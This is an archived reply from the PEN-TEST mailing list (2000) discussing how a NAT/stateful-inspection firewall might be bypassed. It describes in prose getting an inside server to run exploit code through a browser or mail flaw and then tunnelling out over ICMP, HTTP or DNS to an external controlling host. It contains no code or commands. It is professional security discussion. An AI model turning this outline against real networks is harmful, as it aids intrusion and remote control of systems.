Penetration Testing mailing list archives
Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions
From: Andre Delafontaine <andre.delafontaine () ECHOSTAR COM>
Date: Wed, 27 Sep 2000 11:06:42 -0600
I have been thinking about this exact same problem lately. The easiest way I can think of getting around this kind of setup would be to get the server to download and execute some nasty code by having it visit some website (JPEG header buffer overflow in Netscape?), view some email (Outlook attachement handling problems?) or some similar method of inderectly contacting the server. Once the server executes the nasty code, have it discover the NAT'ed protocols and initiate a connection through the firewall (data tunneling through ICMP, http, DNS, ... See recent posts on BugTraq and on this list) to some external host that would "remote control" the inside server. You do say that your setup contains a server. Is that server available from the Internet at all? Does it serve some protocol (http, ftp)? If so, then the firewall is doing portforwarding and won't protect that particular service from "good-looking" traffic, i.e. traffic that passes Stateful Packet Inspection: how can SPI know that web sever X can't support a get request with a filename longer than Y characters without overflowing a buffer? If we knew about the vulnerability, it would be fixed in the server itself. This said, this setup does offer much better protection than no firewall at all :-) Just me 2c, Andre -- Last yeer I kudn't spel Engineer. Now I are won. andre.delafontaine at echostar.com F20 DSS: BD75 66D9 5B2C 66CE 9158 BB27 B199 59CE D117 4E9F F16 RSA: F8 04 FE 50 02 B5 03 02 F6 87 C7 8D F9 2E B8 58
Current thread:
- [PEN-TEST] NAT / Stateful Packet Inspection Questions Leon Rosenstein (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Jose Nazario (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions David Pick (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Deri Jones (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Andre Delafontaine (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Dug Song (Sep 27)
- <Possible follow-ups>
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Loschiavo, Dave (Sep 29)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Fred Mobach (Sep 29)